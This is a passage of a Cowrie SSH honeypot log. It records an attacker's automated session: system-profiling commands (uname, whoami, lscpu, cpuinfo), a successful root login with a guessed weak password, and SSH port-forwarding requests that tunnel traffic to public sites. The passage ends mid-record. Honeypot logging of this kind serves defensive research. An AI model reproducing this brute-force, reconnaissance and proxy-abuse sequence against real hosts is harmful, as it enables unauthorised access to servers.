{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:49.391540Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:50.411558Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:17:50.412419Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:50.665600Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:51.275179Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T13:17:51.275867Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:51.528581Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:52.052812Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T13:17:52.053618Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:52.306344Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53464,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea47b1418c7d","protocol":"ssh","message":"New connection: 212.227.235.229:53464 (1.2.3.4:22) [session: ea47b1418c7d]","sensor":"my-vps","timestamp":"2025-08-26T13:17:52.849019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T13:17:52.850165Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:52.928464Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T13:17:52.929421Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T13:17:52.954251Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:53.182066Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:17:53.475029Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:53.752948Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T13:17:53.753713Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:54.006347Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:54.529519Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T13:17:54.530238Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:54.783124Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:55.391929Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T13:17:55.392684Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.216.40.100","dst_port":443,"src_ip":"212.227.235.229","src_port":37422,"message":"direct-tcp connection request to 54.216.40.100:443 from 127.0.0.1:37422","sensor":"my-vps","timestamp":"2025-08-26T13:17:55.429046Z","session":"ea47b1418c7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:55.645903Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.closed","duration":"28.4","message":"Connection lost after 28.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:55.647194Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.216.40.100","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\"a\\xeb\\x13g6\\xe3\\xd3(\\x88\\xcdT\\xc7\\nA{\\xac\\x1f\\xed\\xbbU\\x92\\xed\\x1a\\xa5W\\xf7B\\x15\\xf8\\xe5; \\x03\\x88\\xe1HR\\xeb\\x1b\\xe6\\x83\\x89ct\\xb4\\'\\xe6\\x8eA\\xec\\x91\\xba\\xcf o\\x16O\\x9b\\xa7\\xf1\\xc3|\\x80D\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc8\\x1cy\\xee\\x11\\xea\\xce$\\x18/Q\\xa8\\xa5{{\\xd6\\xdaL\\xff##\\xd9\\xaba\\x84\\xda\\x8f9W\\x96\\xc6W\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":0,"message":"discarded direct-tcp forward request 0 to 54.216.40.100:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\"a\\xeb\\x13g6\\xe3\\xd3(\\x88\\xcdT\\xc7\\nA{\\xac\\x1f\\xed\\xbbU\\x92\\xed\\x1a\\xa5W\\xf7B\\x15\\xf8\\xe5; \\x03\\x88\\xe1HR\\xeb\\x1b\\xe6\\x83\\x89ct\\xb4\\'\\xe6\\x8eA\\xec\\x91\\xba\\xcf o\\x16O\\x9b\\xa7\\xf1\\xc3|\\x80D\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc8\\x1cy\\xee\\x11\\xea\\xce$\\x18/Q\\xa8\\xa5{{\\xd6\\xdaL\\xff##\\xd9\\xaba\\x84\\xda\\x8f9W\\x96\\xc6W\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T13:17:55.908405Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.62.220.197","dst_port":443,"src_ip":"212.227.235.229","src_port":37934,"message":"direct-tcp connection request to 23.62.220.197:443 from 127.0.0.1:37934","sensor":"my-vps","timestamp":"2025-08-26T13:17:57.168309Z","session":"ea47b1418c7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.62.220.197","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xaa\\x92+\\x16\\xc1E\\xc7\\x18Kt\\twO\\xf0\\xa5\\xfa\\xc3\\\\\\x13:\\xa5\\xac\\x8at\\xc7\\x0c\\x08\\xaf$L\\xcf% k\\xaa;4\\xd1\\xb82\\x13\\xb2\\x0e\\xdd\\xd2\\x87\\xb1\\x93\\x08\\xf0\\xbdm\\xcf\\x06\\xc9\\x93\\xc0d>\\x08\\x1b\\xa38d\\xea\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 {t\\xdd\\\\\\x04\\x93w\\xfd\\x1ds\\x8d\\x01~l\\xdf,\\xe1T`\\x91R\\x0c}\\x98G\\xfe\\xcf\\xc2\\xc1\\xb5fn\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.62.220.197:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xaa\\x92+\\x16\\xc1E\\xc7\\x18Kt\\twO\\xf0\\xa5\\xfa\\xc3\\\\\\x13:\\xa5\\xac\\x8at\\xc7\\x0c\\x08\\xaf$L\\xcf% k\\xaa;4\\xd1\\xb82\\x13\\xb2\\x0e\\xdd\\xd2\\x87\\xb1\\x93\\x08\\xf0\\xbdm\\xcf\\x06\\xc9\\x93\\xc0d>\\x08\\x1b\\xa38d\\xea\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 {t\\xdd\\\\\\x04\\x93w\\xfd\\x1ds\\x8d\\x01~l\\xdf,\\xe1T`\\x91R\\x0c}\\x98G\\xfe\\xcf\\xc2\\xc1\\xb5fn\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T13:17:57.623044Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.208.100","dst_port":443,"src_ip":"212.227.235.229","src_port":38612,"message":"direct-tcp connection request to 142.251.208.100:443 from 127.0.0.1:38612","sensor":"my-vps","timestamp":"2025-08-26T13:17:57.847515Z","session":"ea47b1418c7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.208.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xcde\\x99\\xdc\\xa4};\\x16f\\xb4\\xa67\\x16{c\\x9b\\x01/^1'\\xc2.q\\x81\\xd6A\\xb5%m\\xff| \\xc1\\x8c>&\\x0c\\xf1\\t*\\xa4?\\x81\\x00\\xeb^\\x97\\xd2.\\xb4\\xc7\\x88\\xf5vD\\xb3\\xbd0\\x1e\\x90r~\\tc\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 #%^\\x96\\xd79\\xdda> 